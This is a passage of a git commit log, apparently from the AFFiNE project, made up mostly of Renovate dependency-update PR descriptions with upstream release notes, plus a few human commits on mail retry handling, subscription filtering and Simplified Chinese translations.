| minor | `from: "5.74.0"` → `from: "5.75.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.75.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.74.0...5.75.0)

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 04:07:47 +08:00
renovate[bot] 18471ef9b2 chore: bump up oxlint version to v1.67.0 (#15047)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [oxlint](https://oxc.rs/docs/guide/usage/linter)
([source](https://redirect.github.com/oxc-project/oxc/tree/HEAD/npm/oxlint))
| [`1.66.0` →
`1.67.0`](https://renovatebot.com/diffs/npm/oxlint/1.66.0/1.67.0) |
![age](https://developer.mend.io/api/mc/badges/age/npm/oxlint/1.67.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/oxlint/1.66.0/1.67.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/oxc (oxlint)</summary>

###
[`v1.67.0`](https://redirect.github.com/oxc-project/oxc/blob/HEAD/npm/oxlint/CHANGELOG.md#1670---2026-05-26)

[Compare
Source](https://redirect.github.com/oxc-project/oxc/compare/oxlint_v1.66.0...oxlint_v1.67.0)

##### 🚀 Features

- [`b84941e`](https://redirect.github.com/oxc-project/oxc/commit/b84941e) linter/vue: Implement no-expose-after-await rule ([#22675](https://redirect.github.com/oxc-project/oxc/issues/22675)) (bab)
- [`98b98c1`](https://redirect.github.com/oxc-project/oxc/commit/98b98c1) linter/vue: Implement no-computed-properties-in-data rule ([#22674](https://redirect.github.com/oxc-project/oxc/issues/22674)) (bab)
- [`2d4c919`](https://redirect.github.com/oxc-project/oxc/commit/2d4c919) oxlint: Support `vite-plus/resolveConfig` for vite.config.ts ([#22456](https://redirect.github.com/oxc-project/oxc/issues/22456)) (leaysgur)
- [`2a60012`](https://redirect.github.com/oxc-project/oxc/commit/2a60012) linter/vue: Implement require-render-return rule ([#22613](https://redirect.github.com/oxc-project/oxc/issues/22613)) (bab)
- [`9f227fd`](https://redirect.github.com/oxc-project/oxc/commit/9f227fd) linter/vue: Implement no-deprecated-props-default-this rule ([#21892](https://redirect.github.com/oxc-project/oxc/issues/21892)) (bab)
- [`87f065e`](https://redirect.github.com/oxc-project/oxc/commit/87f065e) linter/vue: Implement return-in-emits-validator rule ([#21935](https://redirect.github.com/oxc-project/oxc/issues/21935)) (bab)
- [`ea0380c`](https://redirect.github.com/oxc-project/oxc/commit/ea0380c) linter/unicorn: Implement `import-style` rule ([#22173](https://redirect.github.com/oxc-project/oxc/issues/22173)) (Hao Chen)
- [`dde40fe`](https://redirect.github.com/oxc-project/oxc/commit/dde40fe) linter/vue: Implement no-watch-after-await rule ([#22006](https://redirect.github.com/oxc-project/oxc/issues/22006)) (bab)
- [`a735eb0`](https://redirect.github.com/oxc-project/oxc/commit/a735eb0) linter/vue: Implement valid-next-tick rule ([#22531](https://redirect.github.com/oxc-project/oxc/issues/22531)) (bab)
- [`6dc615d`](https://redirect.github.com/oxc-project/oxc/commit/6dc615d) linter/vue: Implement no-shared-component-data rule ([#21842](https://redirect.github.com/oxc-project/oxc/issues/21842)) (bab)
- [`a656418`](https://redirect.github.com/oxc-project/oxc/commit/a656418) linter/vue: Implement valid-define-options rule ([#22107](https://redirect.github.com/oxc-project/oxc/issues/22107)) (bab)
- [`bb6f1b2`](https://redirect.github.com/oxc-project/oxc/commit/bb6f1b2) linter/vue: Implement require-slots-as-functions rule ([#22244](https://redirect.github.com/oxc-project/oxc/issues/22244)) (bab)
- [`5fa4774`](https://redirect.github.com/oxc-project/oxc/commit/5fa4774) linter/n: Implement `callback-return` rule ([#22470](https://redirect.github.com/oxc-project/oxc/issues/22470)) (Mikhail Baev)

</details>


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 04:07:20 +08:00
steffenrapp 7a575a4a5b fix: hide experimental settings for doc and folder icons (#15021)
should fix #13955
The emoji doc and folder icons have been officially released with v0.25
but the experimental settings were still available with no effect if
switched.

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->

## Summary by CodeRabbit

* **Chores**
  * Feature flags for emoji folder and document icons are no longer user-configurable.


<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-31 04:06:49 +08:00
renovate[bot] f5fc7c8c00 chore: bump up eslint-plugin-oxlint version to v1.67.0 (#15036)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[eslint-plugin-oxlint](https://redirect.github.com/oxc-project/eslint-plugin-oxlint)
| [`1.66.0` →
`1.67.0`](https://renovatebot.com/diffs/npm/eslint-plugin-oxlint/1.66.0/1.67.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/eslint-plugin-oxlint/1.67.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/eslint-plugin-oxlint/1.66.0/1.67.0?slim=true)
|

---

### Release Notes

<details>
<summary>oxc-project/eslint-plugin-oxlint
(eslint-plugin-oxlint)</summary>

###
[`v1.67.0`](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/releases/tag/v1.67.0)

[Compare
Source](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0)

*No significant changes*

#####     [View changes on
GitHub](https://redirect.github.com/oxc-project/eslint-plugin-oxlint/compare/v1.66.0...v1.67.0)

</details>


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 00:07:16 +08:00
renovate[bot] 7d3e38d652 chore: bump up nestjs (#15035)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs-cls/transactional](https://papooch.github.io/nestjs-cls/)
([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`3.2.0` →
`3.2.1`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs-cls%2ftransactional/3.2.1?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs-cls%2ftransactional/3.2.0/3.2.1?slim=true)
|
|
[@nestjs-cls/transactional-adapter-prisma](https://papooch.github.io/nestjs-cls/)
([source](https://redirect.github.com/Papooch/nestjs-cls)) | [`1.3.4` →
`1.3.5`](https://renovatebot.com/diffs/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.5?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs-cls%2ftransactional-adapter-prisma/1.3.4/1.3.5?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.23/11.1.24?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.23/11.1.24?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.23/11.1.24?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-socket.io/11.1.23/11.1.24?slim=true)
|
| [@nestjs/websockets](https://redirect.github.com/nestjs/nest)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets))
| [`11.1.23` →
`11.1.24`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.23/11.1.24)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fwebsockets/11.1.24?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fwebsockets/11.1.23/11.1.24?slim=true)
|

---

### Release Notes

<details>
<summary>Papooch/nestjs-cls (@nestjs-cls/transactional)</summary>

###
[`v3.2.1`](https://redirect.github.com/Papooch/nestjs-cls/releases/tag/v3.2.1)

[Compare
Source](https://redirect.github.com/Papooch/nestjs-cls/compare/@nestjs-cls/transactional@3.2.0...@nestjs-cls/transactional@3.2.1)

- fix: `has` method respects falsy values ([#57](https://redirect.github.com/Papooch/nestjs-cls/issues/57)) [`69f06e7`](https://redirect.github.com/Papooch/nestjs-cls/commit/69f06e7)

</details>

<details>
<summary>nestjs/nest (@nestjs/common)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@nestjs/core)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-express)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

</details>

<details>
<summary>nestjs/nest (@nestjs/platform-socket.io)</summary>

###
[`v11.1.24`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.24)

[Compare
Source](https://redirect.github.com/nestjs/nest/compare/v11.1.23...v11.1.24)

##### v11.1.24 (2026-05-25)

##### Bug fixes

- `core`
  - [#17009](https://redirect.github.com/nestjs/nest/pull/17009) fix(core): reset dependency-tree cache on metadata changes ([@puneetdixit200](https://redirect.github.com/puneetdixit200))

##### Enhancements

- `core`
  - [#16997](https://redirect.github.com/nestjs/nest/pull/16997) feat(core): warn on late websocket adapter registration ([@hbinhng](https://redirect.github.com/hbinhng))

##### Dependencies

- `platform-ws`
  - [#17011](https://redirect.github.com/nestjs/nest/pull/17011) chore(deps): bump ws from 8.20.1 to 8.21.0 ([@dependabot\[bot\]](https://redirect.github.com/apps/dependabot))

##### Committers: 2

- Nguyễn Hải Bình ([@hbinhng](https://redirect.github.com/hbinhng))
- Puneet Dixit ([@puneetdixit200](https://redirect.github.com/puneetdixit200))

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

👻 **Immortal**: This PR will be recreated if closed unmerged. Get
[config
help](https://redirect.github.com/renovatebot/renovate/discussions) if
that's undesired.

---

- [ ] <!-- rebase-check -->If you want to rebase/retry this PR, check
this box

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-31 00:06:59 +08:00
DarkSky b05c387f96 fix(server): mail test & retry (#15044)
#### PR Dependency Tree


* **PR #15044** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Bug Fixes**
  * Stop sending notifications to disabled users; skip member invites when workspace names contain URLs/domains
  * Improve mail retry handling (per-recipient exhaustion, expiry, and cache cleanup)
  * Make many email headers/lead lines more generic and consistent
  * Fail-safe workspace content parsing to avoid crashes

* **New Features**
  * 24-hour signup protection for sharing, invites, and invite-link creation
  * Job-queue: remove jobs by payload predicate

* **Tests**
  * Expanded tests for mail jobs, SMTP hostname handling, payment checkout, job-queue removal, and abuse-detection utilities
  * Updated test fixtures to set createdAt timestamps for new users

* **Chores**
  * Added required name input for test-email mutation
  * Database flush retry with deadlock detection/backoff

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-31 00:06:29 +08:00
renovate[bot] 2bd920fea6 chore: bump up @inquirer/prompts version to v8 (#15025)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@inquirer/prompts](https://redirect.github.com/SBoudrias/Inquirer.js/blob/main/packages/prompts/README.md)
([source](https://redirect.github.com/SBoudrias/Inquirer.js)) |
[`^7.10.1` →
`^8.0.0`](https://renovatebot.com/diffs/npm/@inquirer%2fprompts/7.10.1/8.5.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@inquirer%2fprompts/8.5.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@inquirer%2fprompts/7.10.1/8.5.0?slim=true)
|

---

### Release Notes

<details>
<summary>SBoudrias/Inquirer.js (@inquirer/prompts)</summary>

###
[`v8.5.0`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...5ca6d1101d5d3f8fb066cd5b389bccfdafbbe0c0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.3...@inquirer/prompts@8.5.0)

###
[`v8.4.3`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.3)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.2...@inquirer/prompts@8.4.3)

- Fix: Windows rendering bug
- Fix: Preserve exact literal types in `choices` array (Typescript only)
- Fix: Allow input `default` value to be of type `undefined` (Typescript
only)
- Bump dependencies

###
[`v8.4.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.1...@inquirer/prompts@8.4.2)

- Fix: some Windows terminals would freeze and not react to keypresses.

###
[`v8.4.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.4.0...@inquirer/prompts@8.4.1)

- Improve `expand` prompt type inference.

###
[`v8.4.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.4.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.2...@inquirer/prompts@8.4.0)

- Feat: Added a loading message while validating editor prompt input.
- Type improvement: Better type inference with checkbox, search and
expand prompts.
- Fix: `editor` prompt not always properly handling editor path on
windows.

###
[`v8.3.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.1...@inquirer/prompts@8.3.2)

- Fix broken 8.3.1 release process.

###
[`v8.3.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.3.0...@inquirer/prompts@8.3.1)

- Bump dependencies

###
[`v8.3.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.3.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.1...@inquirer/prompts@8.3.0)

- Fix: Keypresses happening before a prompt is rendered are now ignored.
- Fix (checkbox): Elements that are both checked and disabled are now
always included in the returned array.
- Feat (select/checkbox): Cursor will now hover disabled options of the
list; but they still cannot be interacted with. This prevents the cursor
jumping ahead in ways that can be confusing.
- Feat: various new theme options to make all prompts content
localizable.

Finally, see our new [`@inquirer/i18n`
package](https://redirect.github.com/SBoudrias/Inquirer.js/tree/main/packages/i18n)!

###
[`v8.2.1`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.2.0...@inquirer/prompts@8.2.1)

- chore: Switch `wrap-ansi` with `fast-wrap-ansi`

###
[`v8.2.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.2.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.1.0...@inquirer/prompts@8.2.0)

- feat(`search`): Add support for `default`.
- feat(`rawlist`): Add support for `description` of choices. That
information is displayed under the list when the choice is highlighted.
- Bump dependencies

###
[`v8.1.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.1.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.2...@inquirer/prompts@8.1.0)

- Feat: `rawlist` now supports `default` option.
- Fix: `select` now infers the return type properly when passing a `choices`
array of string literals.

###
[`v8.0.2`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.2)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.1...@inquirer/prompts@8.0.2)

- Fix Typescript not discovering types when `moduleResolution` is set to
`commonjs` (you probably want to fix that in your project if it's still
in your tsconfig)

###
[`v8.0.1`](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@8.0.0...@inquirer/prompts@8.0.1)

###
[`v8.0.0`](https://redirect.github.com/SBoudrias/Inquirer.js/releases/tag/%40inquirer/prompts%408.0.0)

[Compare
Source](https://redirect.github.com/SBoudrias/Inquirer.js/compare/@inquirer/prompts@7.10.1...@inquirer/prompts@8.0.0)

### Release Notes

#### 🚨 Breaking Changes

This is a major release that modernizes the codebase for Node.js ≥ 20.

##### ESM Only - No More CommonJS Support

**Impact:** All packages are now ESM-only. CommonJS imports are no
longer supported.

If you're on modern Node versions (≥ 20), this should be transparent and
have no impact.

##### Node.js Version Requirement

**Minimum Node.js version is now 20.x**

Node.js versions below 20 are no longer supported. Please upgrade to
Node.js 20 or later.

Node min versions: `>=23.5.0 || ^22.13.0 || ^21.7.0 || ^20.12.0`

##### Deprecated APIs Removed

The following deprecated APIs have been removed after being deprecated
in previous releases:

##### `list` prompt alias removed (affects `inquirer` package only)

The `list` alias has been removed from the `inquirer` package. This only
impacts users of the legacy `inquirer` package, not users of
`@inquirer/prompts` or individual prompt packages.

```js
//  No longer available (inquirer package only)
import inquirer from 'inquirer';
const answer = await inquirer.prompt([
  { type: 'list', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] }
]);

//  Use 'select' instead
import inquirer from 'inquirer';
const answer = await inquirer.prompt([
  { type: 'select', name: 'choice', message: 'Pick one:', choices: ['a', 'b'] }
]);
```

##### `helpMode` theme property removed

```js
//  No longer available
const answer = await select({
  theme: { helpMode: 'never' }
});

//  Use theme.style.keysHelpTip instead
const answer = await select({
  theme: {
    style: {
      keysHelpTip: () => undefined // or your custom styling function
    }
  }
});
```

This affects the following prompts:

- `@inquirer/checkbox`
- `@inquirer/search`
- `@inquirer/select`

##### `instructions` config property removed

```js
//  No longer available
const answer = await checkbox({
  instructions: 'Custom instructions'
});

//  Use theme.style.keysHelpTip instead
const answer = await checkbox({
  theme: {
    style: {
      keysHelpTip: (text) => 'Custom instructions'
    }
  }
});
```

This affects the following prompts:

- `@inquirer/checkbox`
- `@inquirer/search`
- `@inquirer/select`

##### `cancel()` method removed

The `cancel()` method on prompt return custom `Promise` has been
removed.

```js
//  No longer available
const answerPromise = input({ message: 'Name?' });
answerPromise.cancel();
const answer = await answerPromise;

//  Use AbortSignal instead
const controller = new AbortController();
const answer = await input(
  { message: 'Name?' },
  { signal: controller.signal }
);
controller.abort();
```

##### Color Library Change: yoctocolors → Node.js `styleText`

**Internal change:** The project now uses Node.js built-in
`util.styleText()` instead of the `yoctocolors` package for terminal
colors. This makes Inquirer smaller and reduces risks of vulnerabilities
coming from transitive dependencies.

</details>


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-28 15:21:54 +08:00
renovate[bot] b3b9c54a89 chore: bump up @types/nodemailer version to v8 (#15026)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
|
[@types/nodemailer](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/master/types/nodemailer)
([source](https://redirect.github.com/DefinitelyTyped/DefinitelyTyped/tree/HEAD/types/nodemailer))
| [`^7.0.0` →
`^8.0.0`](https://renovatebot.com/diffs/npm/@types%2fnodemailer/7.0.9/8.0.0)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@types%2fnodemailer/8.0.0?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@types%2fnodemailer/7.0.9/8.0.0?slim=true)
|


Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-28 15:21:06 +08:00
DarkSky 1d08e1d8c0 fix(server): dirty data handle (#15034)
#### PR Dependency Tree


* **PR #15034** 👈

This tree was auto-generated by
[Charcoal](https://github.com/danerwilliams/charcoal)

<!-- This is an auto-generated comment: release notes by coderabbit.ai
-->
## Summary by CodeRabbit

* **Refactor**
  * Consolidated subscription visibility and “active” selection logic so all subscription queries use a shared, consistent filter across the platform.

* **Tests**
  * Added a test to ensure expired subscriptions are excluded from active subscription results.
  * Updated test fixtures to differentiate expired, unexpired, and onetime subscriptions for more accurate coverage.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->
2026-05-28 15:20:17 +08:00
xuzhi 66a6a5fffc feat(i18n): add missing zh-Hans translations (#15032)
## Summary

This PR completes the missing Simplified Chinese (`zh-Hans`) i18n
resource coverage.

The current i18n completeness calculation is based on key coverage
between `en.json` and each locale resource file. Before this change,
`zh-Hans.json` contained 2331 keys while `en.json` contained 2406 keys,
resulting in a displayed completeness of 97%.

This change adds the 75 missing `zh-Hans` translation entries and
updates the generated completeness value for `zh-Hans` from 97% to 100%.

## Changes

- Added 75 missing Simplified Chinese translations to
`packages/frontend/i18n/src/resources/zh-Hans.json`.
- Updated `packages/frontend/i18n/src/i18n-completenesses.json` so
`zh-Hans` now reports 100% completeness.
- Kept the scope limited to missing i18n resource keys only.

## Notes

This PR does not modify existing `zh-Hans` translations, terminology
choices, or hardcoded English UI strings outside the i18n resource
files.

## Verification

- Confirmed `zh-Hans.json` parses successfully.
- Confirmed `zh-Hans.json` now has full key coverage against `en.json`.
- Confirmed missing key count is 0.
- Confirmed computed `zh-Hans` completeness is 100%.
- Ran pre-commit checks:
  - `yarn lint-staged`
  - `yarn lint:ox`


## Summary by CodeRabbit

* **Chores**
* Completed Chinese (Simplified) translations with 100% coverage for the
application.
* Added new translations across multiple areas: appearance and image
settings, export functionality, document import from Bear and Obsidian,
analytics and viewer information, editor settings including auto-date
titles and icon options, workspace sharing controls, calendar
integration with CalDAV support, share menu tooltips, and comprehensive
error messages.

2026-05-28 05:15:13 +08:00
renovate[bot] 4f14e8840c chore: bump up RevenueCat/purchases-ios-spm version to from: "5.74.0" (#15024)
This PR contains the following updates:

| Package | Update | Change |
|---|---|---|
|
[RevenueCat/purchases-ios-spm](https://redirect.github.com/RevenueCat/purchases-ios-spm)
| minor | `from: "5.73.0"` → `from: "5.74.0"` |

---

### Release Notes

<details>
<summary>RevenueCat/purchases-ios-spm
(RevenueCat/purchases-ios-spm)</summary>

###
[`v5.74.0`](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.1...5.74.0)

###
[`v5.73.1`](https://redirect.github.com/RevenueCat/purchases-ios-spm/blob/HEAD/CHANGELOG.md#5731)

[Compare
Source](https://redirect.github.com/RevenueCat/purchases-ios-spm/compare/5.73.0...5.73.1)

#### 5.73.1

</details>

---

### Configuration

📅 **Schedule**: (UTC)

- Branch creation
  - At any time (no schedule defined)
- Automerge
  - At any time (no schedule defined)

🚦 **Automerge**: Disabled by config. Please merge this manually once you
are satisfied.

♻ **Rebasing**: Whenever PR becomes conflicted, or you tick the
rebase/retry checkbox.

🔕 **Ignore**: Close this PR and you won't be reminded about this update
again.

---

This PR was generated by [Mend Renovate](https://mend.io/renovate/).
View the [repository job
log](https://developer.mend.io/github/toeverything/AFFiNE).

Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com>
2026-05-24 19:28:25 +08:00
renovate[bot] 95dd8d03be chore: bump up nestjs (#15023)
This PR contains the following updates:

| Package | Change |
[Age](https://docs.renovatebot.com/merge-confidence/) |
[Confidence](https://docs.renovatebot.com/merge-confidence/) |
|---|---|---|---|
| [@nestjs/apollo](https://redirect.github.com/nestjs/graphql) |
[`13.4.1` →
`13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fapollo/13.4.1/13.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fapollo/13.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fapollo/13.4.1/13.4.2?slim=true)
|
| [@nestjs/common](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/common))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcommon/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcommon/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcommon/11.1.21/11.1.23?slim=true)
|
| [@nestjs/core](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/core))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fcore/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fcore/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fcore/11.1.21/11.1.23?slim=true)
|
| [@nestjs/graphql](https://redirect.github.com/nestjs/graphql) |
[`13.4.1` →
`13.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fgraphql/13.4.1/13.4.2)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fgraphql/13.4.2?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fgraphql/13.4.1/13.4.2?slim=true)
|
| [@nestjs/platform-express](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-express))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-express/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-express/11.1.23?slim=true)
|
![confidence](https://developer.mend.io/api/mc/badges/confidence/npm/@nestjs%2fplatform-express/11.1.21/11.1.23?slim=true)
|
| [@nestjs/platform-socket.io](https://nestjs.com)
([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io))
| [`11.1.21` →
`11.1.23`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.21/11.1.23)
|
![age](https://developer.mend.io/api/mc/badges/age/npm/@nestjs%2fplatform-socket.io/11.1.23?slim=true)
|
